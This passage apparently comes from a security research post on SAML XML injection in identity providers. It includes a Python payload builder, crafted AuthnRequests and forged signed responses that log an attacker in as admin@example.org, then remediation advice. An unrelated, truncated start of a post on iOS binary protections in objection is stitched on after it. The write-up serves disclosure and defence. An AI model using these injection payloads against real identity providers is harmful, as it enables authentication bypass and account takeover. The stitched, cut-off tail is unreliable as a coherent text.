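As a rough illustration of how such a payload is assembled, the sketch below XML-encodes the injected markup so it can travel inside a quoted attribute value. The assertion body here is abbreviated and hypothetical; a real payload mirrors a complete, legitimate assertion observed from the target identity provider.

```python
from xml.sax.saxutils import escape

# The legitimate request ID the service provider generated.
request_id = "_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"

# Abbreviated, hypothetical injection payload: escape the attribute,
# open a forged assertion, then leave an "elem" attribute open to
# absorb the dangling markup the IdP template will append.
injected_xml = (
    '"><saml:Assertion ID="_injected">'
    "<saml:NameID>admin@example.org</saml:NameID>"
    '</saml:Assertion><elem test="'
)

# XML-encode the payload so it survives inside the quoted ID attribute
# of the AuthnRequest document sent to the identity provider.
malicious_id = request_id + escape(injected_xml, {'"': "&quot;"})
print(malicious_id)
```

The encoded result matches the `&quot;&gt;&lt;saml:Assertion…` form seen in the transported request below.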
The following SAML request contains this payload, encoded for transport: <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;samlp:Status&gt;&lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/&gt;&lt;/samlp:Status&gt;&lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;&lt;saml:Issuer&gt;http://idp.adam.local:8080&lt;/saml:Issuer&gt;&lt;saml:Subject&gt;&lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;&gt;admin@example.org&lt;/saml:NameID&gt;&lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;&gt;&lt;saml:SubjectConfirmationData InResponseTo=&quot;_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot; Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/&gt;&lt;/saml:SubjectConfirmation&gt;&lt;/saml:Subject&gt;&lt;saml:Conditions NotBefore=&quot;2021-02-11T22:45:54.579Z&quot; NotOnOrAfter=&quot;2021-02-11T23:50:54.579Z&quot;&gt;&lt;saml:AudienceRestriction&gt;&lt;saml:Audience&gt;http://sp.adam.local/&lt;/saml:Audience&gt;&lt;/saml:AudienceRestriction&gt;&lt;/saml:Conditions&gt;&lt;saml:AuthnStatement AuthnInstant=&quot;2021-02-11T22:45:54.579Z&quot;&gt;&lt;saml:AuthnContext&gt;&lt;saml:AuthnContextClassRef&gt;urn:oasis:names:tc:SAML:2.0:ac:classes:Password&lt;/saml:AuthnContextClassRef&gt;&lt;/saml:AuthnContext&gt;&lt;/saml:AuthnStatement&gt;&lt;/saml:Assertion&gt;&lt;elem test=&quot;" Version="2.0" 
IssueInstant="2021-02-11T23:45:28Z" Destination="http://idp.adam.local:8080/SSOService" AssertionConsumerServiceURL="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>http://sp.adam.local/</saml:Issuer><samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/></samlp:AuthnRequest> When this was received by the identity provider, the following SAML response was produced. The injected XML has been highlighted in bold, although note that the XML was adjusted when the identity provider inserted the XML signature: <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_b804b8b3-1ced-4e16-9ef3-03b82338729b" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b804b8b3-1ced-4e16-9ef3-03b82338729b"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>oE/7pnmcvbFYVsIPC4tao56UR/yAkpv3VL/VBXZXrXk=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>mA6oPZaOUMXxlFRQG5LzoVpmV4VB5K4iIQJ2sseqgYLXhrszbvJ85v7Qud6Fp8xKqC4nVIUZw73eHR2d4nakLKd0lPAqk7gTVC+1V1M3lpMkMCriqM5BNcR/lKpln3SnEzgUPAtbOgmsvKSmhME7fXIY9BUW0Kv/8FcCEdUGg70=</ds:SignatureValue> <ds:KeyInfo> <ds:X509Data> 
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> 
<saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=""/> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_68a25c00-2c08-458a-a760-40f5a55ada07" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData NotOnOrAfter="2021-02-11T23:50:49.796Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData 
InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=""/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T23:45:49.796Z" NotOnOrAfter="2021-02-11T23:50:49.796Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T23:45:49.796Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> It should be noted that, due to the existence of two injection points, this SAML response contains three assertions; one injected using the XML injection payload, the second produced by the identity provider (with the legitimate user@example.org NameID), and another injected assertion embedded within the legitimate assertion (at the location of the second InResponseTo attribute). As described previously, the handling of such a SAML response will depend on the configuration of the service provider. 
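How a multi-assertion response ends up authenticating the attacker can be sketched with a toy parser. This is hypothetical service-provider logic (signature checks omitted) that simply trusts the first Assertion element it finds:

```python
import xml.etree.ElementTree as ET

SAML = "urn:oasis:names:tc:SAML:2.0:assertion"

def first_name_id(response_xml: str) -> str:
    # Hypothetical SP behaviour: authenticate as the NameID found in
    # the *first* Assertion element, ignoring any later ones.
    root = ET.fromstring(response_xml)
    return root.findtext(
        f".//{{{SAML}}}Assertion/{{{SAML}}}Subject/{{{SAML}}}NameID"
    )

# Toy response with an injected assertion placed before the legitimate one.
demo = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    f'xmlns:saml="{SAML}">'
    "<saml:Assertion><saml:Subject>"
    "<saml:NameID>admin@example.org</saml:NameID>"
    "</saml:Subject></saml:Assertion>"
    "<saml:Assertion><saml:Subject>"
    "<saml:NameID>user@example.org</saml:NameID>"
    "</saml:Subject></saml:Assertion>"
    "</samlp:Response>"
)
print(first_name_id(demo))  # → admin@example.org: the injected identity wins
```

A service provider that instead took the last assertion, or rejected duplicates, would not be exploitable by this ordering alone.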
During tests performed by NCC Group, the vulnerable identity provider was connected to a SimpleSAMLphp installation; this accepted the SAML response, and used the first occurrence of the assertion to authenticate the user, meaning that the attacker was logged in to the service under the context of admin@example.org. If the service provider uses the second assertion instead of the first, or if it rejects the response due to the repeated assertions, it may be possible to utilize XML comments again to effectively remove the identity provider’s assertion from the response. Two methods have been used successfully in tests performed by NCC Group. The first, if the XML parser used by the service provider is not too strict, simply leaves an unterminated comment at the end of the payload. The identity provider may ignore the lack of a closure for the comment, and generate a signature for the response using only the attacker’s assertion. An example of a payload which may achieve this has been provided below (decoded and formatted for readability): _29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> 
</saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-12T06:51:42.705Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </saml:Response><!-- When the SAML response was generated by the identity provider, the content following the "<!--" string was ignored, effectively removing both the identity provider’s assertion and the second assertion reflected at the second InResponseTo insertion point. Some identity providers will reject this payload, however, because the XML is invalid with an unterminated comment. To circumvent this restriction, the following alternative payload was developed (again, decoded and formatted for readability): _365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' --> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> <![CDATA['> <!--
]]> <ncc-elem a=" This payload takes advantage of the fact that the content will be repeated twice within the SAML response produced by the identity provider. A combination of a comment and a CDATA block is used to enclose the identity provider’s assertion and inject the new one. The payload can be broken down into the following components: First, a quote is used to escape from the first InResponseTo attribute, and a new attribute, "ncc-injection", is created. This attribute uses single quotes for the value, so that the double quotes in the XML for the injected assertion can be preserved. The payload within the attribute value includes a closing comment string "-->", followed by the malicious assertion XML. This is similar to previous payloads, but stops at the SubjectConfirmationData element, as this is where the second InResponseTo attribute occurs. Following the assertion XML, the attribute value includes the string used to open a CDATA block. Then, the single quote and angle bracket close the ncc-injection attribute and the Response element. The "<!--" string is used to open a new comment; this comment will enclose the identity provider’s assertion. Then a "]]>" string is included, which will eventually close the CDATA block. Finally, a new element, "ncc-elem", is included with an attribute; this will balance the quote character left by the InResponseTo attribute created by the identity provider. (Note: again, this element may not be required, depending on the XML parser implementation.) When processed by a vulnerable identity provider, the following XML was produced. Note that the first injected assertion, enclosed within the "samlp:Response" "ncc-injection" attribute, is not active. The comment encloses the first part of the identity provider’s assertion, which specifies the "user@example.org" username.
Then, when the payload is repeated in the second InResponseTo attribute of the identity provider’s assertion, the "-->" string terminates the comment and the malicious XML becomes active. The malicious XML stops at the SubjectConfirmationData element, where the CDATA block begins; this CDATA block is designed to enclose the second "<!--" comment string, to prevent the remainder of the assertion/response XML from being commented out. Finally, the "ncc-elem" element balances the quotes, and the remainder of the identity provider’s assertion template closes the XML, creating a valid SAML response: <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_65a7aa51-521c-46c2-8825-a0b51f730101" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=" -->&lt;saml:Issuer>http://idp.adam.local:8080&lt;/saml:Issuer>&lt;samlp:Status>&lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/>&lt;/samlp:Status>&lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;>&lt;saml:Issuer>http://idp.adam.local:8080&lt;/saml:Issuer>&lt;saml:Subject>&lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;>admin@example.org&lt;/saml:NameID>&lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;>&lt;saml:SubjectConfirmationData InResponseTo=&quot;_365db265e0bc16c34ffa06ad9b382bbff77541ee55&quot; NotOnOrAfter=&quot;2021-02-12T06:51:42.705Z&quot;
Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/>-->&lt;![CDATA["><!-- ]]><ncc-elem a=""><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_f78b7401-f325-4083-b280-2c55b6ef02e1" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z"><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T06:00:46.978Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' --> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_65a7aa51-521c-46c2-8825-a0b51f730101"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>20FqC5eEhH0bv6lYVD6Dh1VczuZNg0NeemP0B32GFwc=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>O0XjQRmGusm2a2ImysF1wTB2HJSnCNE6aIxKd7cF8ZI+rEyHff4+mbW1uD81hwi4tvdwDjTZZNsnW8djLbAgT8E6dV2HsisXeDRBXvIobi1qW3KUf9k4oO70G0bhVjKWzCAHUo53SGNc6UDuvkijXoxEdyg5US13raeuXsjKs9w=</ds:SignatureValue> <ds:KeyInfo> <ds:X509Data> 
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>--><![CDATA['><!-- ]]> <ncc-elem a=""/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-12T05:55:46.978Z" 
NotOnOrAfter="2021-02-12T06:00:46.978Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-12T05:55:46.978Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> Depending on where the InResponseTo attributes are located within the XML document, it may be necessary to adjust the payload to ensure that the XML is correct and well-formed. There are some caveats to the InResponseTo attacks, however. This particular injection was only successful because the assertion in the SAML response was not signed. Some identity providers sign both the assertion and the SAML response. In this situation, it may only be possible to utilize the second InResponseTo injection point, as any modifications to this assertion after the application of the signature could cause the verification to fail. The specifics of this approach will vary based on the implementation of the identity provider, and the libraries used to parse and sign the XML. Recommendations Organizations and services that rely on SAML for authentication should examine identity providers and determine whether they are affected by XML injection vulnerabilities, particularly if the identity provider uses string-based templates to build SAML responses/assertions with user controlled data. Ideally, SAML responses and assertions should be constructed using an appropriate XML library that can safely set user-controlled data in attributes and text nodes. If it is absolutely necessary to use a string template, or string functions, to include user-controlled data within SAML messages, the data should be strictly validated. If XML characters are detected in the user-input, the authentication attempt should be rejected with an error message. 
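The validate-and-reject approach described above can be sketched as follows. The ID regex is an assumption about what legitimate request IDs look like in this environment, not something mandated by the SAML specification; adjust it to whatever your service providers actually generate.

```python
import re
import xml.etree.ElementTree as ET

# Assumed ID shape: an underscore/letter-prefixed token, as seen in the
# requests above. XML metacharacters can never match this pattern.
ID_PATTERN = re.compile(r"^[A-Za-z_][A-Za-z0-9._-]*$")

def subject_confirmation_data(in_response_to: str) -> bytes:
    if not ID_PATTERN.match(in_response_to):
        # Validation failed: reject the authentication attempt.
        raise ValueError("SAML request ID contains invalid characters")
    elem = ET.Element("saml:SubjectConfirmationData")
    # Element.set() stores the raw value; the serializer encodes any
    # XML metacharacters, so even if the validation above were somehow
    # bypassed, the value could not break out of the attribute.
    elem.set("InResponseTo", in_response_to)
    return ET.tostring(elem)

print(subject_confirmation_data("_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"))
```

An ID such as `_abc"><saml:Assertion…` is rejected before it ever reaches the response template.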
Before insertion into the document, XML encoding should be applied to the data, to ensure that even if the validation is bypassed, the user input cannot inject additional XML. Additionally, consider enforcing the use of signatures for SAML authentication requests sent from service providers, where possible. If the SAML request signature is validated by the identity provider, any attempt to modify the request to include an XML injection payload (such as those which exploit the InResponseTo attribute) can be detected. Source: https://research.nccgroup.com/2021/03/29/saml-xml-injection/
  10. on ios binary protections Reading time ~10 min Posted by Leon Jacobs on 02 March 2021 Categories: Ios, Mobile, Objection, Binary I just got off a call with a client, and realised we need to think about how we report binary protections a bit more. More specifically, the ios info binary command in objection. These protections can be a pain to explain if not well understood, and even harder to remediate! Binary protections make exploitation attempts much harder, so naturally we want all of them on. However, as you’ll see in this article, not everything can always be enabled, and sometimes it’s hard to understand why. ios binary protections information parsed by objection a quick primer Before diving into the protections themselves, let’s take a look at how objection parses each. The core of the parsing logic lives here, leveraging the nodejs macho package. Using macho, we can programmatically parse any Mach-O format file for information about the binary. The macho package lets you specify a file to parse, and because we are already injected into a target process using Frida, we can access any file in the application bundle too. Reading the info() function in the agent, you’d see we get the loaded modules using Frida APIs (Process.enumerateModules()), and then proceed to parse each file using the macho package. Once we have parsed a target binary or library, we ask some questions to determine whether certain binary protections are enabled. Let’s take a look at the PIE, ARC, and Canary flags. pie As you’d expect, a Mach-O file has a header. Part of the header structure is the flags field, which is a bitmask of all the applicable flags for that binary. (Refer to the Mach-O loader header source code here, specifically the MH_-prefixed flags, or the epic description here.) The macho package we are using in objection simply parses that flags field, which means we can ask it if exe.flags.pie is set. In other words, is 0x200000 set in the target binary? Pretty neat, right?
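The flag check can be reproduced without objection at all. The sketch below reads the Mach-O header directly and tests the MH_PIE bit; it assumes a thin, little-endian, 64-bit binary, which is a deliberate simplification.

```python
import struct

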